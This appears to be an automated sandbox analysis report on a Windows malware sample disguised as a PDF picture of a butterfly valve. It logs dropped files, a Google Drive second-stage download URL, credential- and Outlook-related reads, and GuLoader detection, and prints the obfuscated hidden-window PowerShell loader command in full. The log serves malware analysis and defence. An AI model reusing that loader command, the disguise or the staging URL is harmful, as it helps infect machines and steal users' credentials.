Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000001.00000002.2148496892.00000000085DE000.00000004.00000020.00020000.00000000.sdmp, PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/.
Source: Slringsnettets.exe, 00000006.00000002.2902307030.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiYf
Source: Slringsnettets.exe, 00000006.00000003.2121700313.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032DE000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000003.2121700313.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=download
Source: Slringsnettets.exe, 00000006.00000003.2121700313.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=downloadI
Source: Slringsnettets.exe, 00000006.00000003.2121700313.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1_n4h_rjLzWi6t1sW7yvUNQ7sooOdFYiY&export=downloadeg
Source: powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405050

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Code function: 6_2_028685CC Sleep,LdrInitializeThunk,NtProtectVirtualMemory,

6_2_028685CC

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004030D9

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_00406344	0_2_00406344
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_0040488F	0_2_0040488F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_047DF000	1_2_047DF000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_047DF8D0	1_2_047DF8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_047DECB8	1_2_047DECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0730BBE8	1_2_0730BBE8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll 5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: invalid certificate

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/23@2/3

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

0_2_004030D9

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040431C

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

File created: C:\Users\user\Desktop\Flyverdragter.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsd4275.tmp

Jump to behavior

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Slringsnettets.exe, 00000006.00000003.2128554098.0000000000065000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	ReversingLabs: Detection: 23%
Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Virustotal: Detection: 22%

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

File read: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe "C:\Users\user\AppData\Local\Temp\Slringsnettets.exe"
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe "C:\Users\user\AppData\Local\Temp\Slringsnettets.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Flyverdragter.lnk.0.dr

LNK file: ..\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\triorchism\hvidte.pal

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: tem.Core.pdbF# source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2148496892.000000000858C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2128685879.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: Slringsnettets.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: 00000001.00000002.2150551210.0000000009A8F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nanosomia $Tiptoeing $Pilumnus), (Heptahexahedral @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Cohitre172 = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($scyphula)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Pollinium, $false).DefineType($Infernalship, $Sj

Suspicious powershell command line found

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"			Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsExec.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll	Jump to dropped file

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
